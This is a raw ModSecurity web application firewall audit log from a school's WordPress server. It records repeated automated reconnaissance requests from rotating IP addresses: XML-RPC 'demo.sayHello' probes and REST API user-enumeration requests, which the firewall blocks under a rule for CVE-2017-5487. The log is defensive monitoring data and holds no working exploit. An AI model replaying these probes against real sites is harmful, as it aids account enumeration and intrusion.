103.236.140.4 8181 --cdd0291a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cdd0291a-C-- demo.sayHello --cdd0291a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdd0291a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664488605694 4924 (- - -) Stopwatch2: 1746664488605694 4924; combined=3768, p1=504, p2=3045, p3=23, p4=24, p5=99, sr=114, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdd0291a-Z-- --9328265e-A-- [08/May/2025:07:34:50 +0700] aBv8Kis5rYyn3jlLjjK-yAAAAMs 103.236.140.4 41994 103.236.140.4 8181 --9328265e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9328265e-C-- demo.sayHello --9328265e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9328265e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664490086361 5134 (- - -) Stopwatch2: 1746664490086361 5134; combined=3770, p1=439, p2=3118, p3=28, p4=28, p5=92, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9328265e-Z-- --97ca7c47-A-- [08/May/2025:07:34:50 +0700] aBv8Kis5rYyn3jlLjjK-yQAAAMg 103.236.140.4 41996 103.236.140.4 8181 --97ca7c47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --97ca7c47-C-- demo.sayHello --97ca7c47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --97ca7c47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664490345709 5296 (- - -) Stopwatch2: 1746664490345709 5296; combined=4059, p1=523, p2=3272, p3=29, p4=32, p5=121, sr=77, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97ca7c47-Z-- --c058f62a-A-- [08/May/2025:07:35:49 +0700] aBv8ZcP9GxxPAbCroFbMkwAAAE8 103.236.140.4 42008 103.236.140.4 8181 --c058f62a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c058f62a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c058f62a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664549311111 3249 (- - -) Stopwatch2: 1746664549311111 3249; combined=1432, p1=507, p2=893, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c058f62a-Z-- --1851442d-A-- [08/May/2025:07:35:56 +0700] aBv8bCs5rYyn3jlLjjK-zQAAAM4 103.236.140.4 42016 103.236.140.4 8181 --1851442d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1851442d-C-- demo.sayHello --1851442d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1851442d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664556362664 5971 (- - -) Stopwatch2: 1746664556362664 5971; combined=4415, p1=569, p2=3586, p3=35, p4=31, p5=121, sr=82, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1851442d-Z-- --b31ae03d-A-- [08/May/2025:07:36:25 +0700] aBv8iSs5rYyn3jlLjjK-zgAAAMQ 103.236.140.4 42022 103.236.140.4 8181 --b31ae03d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b31ae03d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b31ae03d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664585660479 3142 (- - -) Stopwatch2: 1746664585660479 3142; combined=1288, p1=433, p2=819, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b31ae03d-Z-- --6c4dcc7a-A-- [08/May/2025:07:36:32 +0700] aBv8kI4K347NtBcwXKwFYAAAAJY 103.236.140.4 42026 103.236.140.4 8181 --6c4dcc7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c4dcc7a-C-- demo.sayHello --6c4dcc7a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c4dcc7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664592237471 6533 (- - -) Stopwatch2: 1746664592237471 6533; combined=4645, p1=644, p2=3807, p3=31, p4=35, p5=75, sr=118, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c4dcc7a-Z-- --15432b28-A-- [08/May/2025:07:37:33 +0700] aBv8zY4K347NtBcwXKwFZAAAAIE 103.236.140.4 42036 103.236.140.4 8181 --15432b28-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15432b28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15432b28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664653360620 2673 (- - -) Stopwatch2: 1746664653360620 2673; combined=1142, p1=372, p2=749, p3=0, p4=0, p5=21, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15432b28-Z-- --0af66113-A-- [08/May/2025:07:37:39 +0700] aBv806cs1DvJ_HgMHE_xhAAAABE 103.236.140.4 42040 103.236.140.4 8181 --0af66113-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0af66113-C-- demo.sayHello --0af66113-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0af66113-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664659664154 5896 (- - -) Stopwatch2: 1746664659664154 5896; combined=4056, p1=624, p2=3249, p3=32, p4=36, p5=69, sr=81, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0af66113-Z-- --04175c7a-A-- [08/May/2025:07:40:16 +0700] aBv9cKcs1DvJ_HgMHE_xiAAAAAE 103.236.140.4 42074 103.236.140.4 8181 --04175c7a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04175c7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04175c7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664816579876 3309 (- - -) Stopwatch2: 1746664816579876 3309; combined=1447, p1=507, p2=907, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04175c7a-Z-- --7c886573-A-- [08/May/2025:07:40:22 +0700] aBv9dsP9GxxPAbCroFbMmwAAAEo 103.236.140.4 42078 103.236.140.4 8181 --7c886573-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.205 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c886573-C-- demo.sayHello --7c886573-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c886573-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664822060932 5850 (- - -) Stopwatch2: 1746664822060932 5850; combined=4263, p1=599, p2=3395, p3=28, p4=86, p5=91, sr=153, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c886573-Z-- --7184a050-A-- [08/May/2025:07:49:53 +0700] aBv_scP9GxxPAbCroFbMnwAAAEc 103.236.140.4 42098 103.236.140.4 8181 --7184a050-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7184a050-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7184a050-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746665393590409 3294 (- - -) Stopwatch2: 1746665393590409 3294; combined=1397, p1=481, p2=885, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7184a050-Z-- --3d28c122-A-- [08/May/2025:07:50:10 +0700] aBv_wo4K347NtBcwXKwFbgAAAJY 103.236.140.4 42102 103.236.140.4 8181 --3d28c122-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d28c122-C-- demo.sayHello --3d28c122-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d28c122-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746665410266094 5706 (- - -) Stopwatch2: 1746665410266094 5706; combined=3896, p1=510, p2=3066, p3=33, p4=114, p5=102, sr=60, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d28c122-Z-- --4f2d8467-A-- [08/May/2025:07:56:29 +0700] aBwBPacs1DvJ_HgMHE_xjQAAAAg 103.236.140.4 42124 103.236.140.4 8181 --4f2d8467-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f2d8467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f2d8467-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746665789251609 3447 (- - -) Stopwatch2: 1746665789251609 3447; combined=1463, p1=478, p2=947, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f2d8467-Z-- --2f170d55-A-- [08/May/2025:07:56:36 +0700] aBwBRKcs1DvJ_HgMHE_xjgAAABA 103.236.140.4 42128 103.236.140.4 8181 --2f170d55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f170d55-C-- demo.sayHello --2f170d55-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f170d55-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746665796749878 4698 (- - -) Stopwatch2: 1746665796749878 4698; combined=3775, p1=457, p2=2993, p3=23, p4=26, p5=151, sr=66, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f170d55-Z-- --8a739a70-A-- [08/May/2025:08:01:22 +0700] aBwCYis5rYyn3jlLjjK-1gAAAMI 103.236.140.4 42192 103.236.140.4 8181 --8a739a70-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a739a70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a739a70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746666082646622 3131 (- - -) Stopwatch2: 1746666082646622 3131; combined=1290, p1=435, p2=825, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a739a70-Z-- --ae6a2370-A-- [08/May/2025:08:01:29 +0700] aBwCaacs1DvJ_HgMHE_xkwAAAAQ 103.236.140.4 42196 103.236.140.4 8181 --ae6a2370-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ae6a2370-C-- demo.sayHello --ae6a2370-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae6a2370-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746666089732879 5092 (- - -) Stopwatch2: 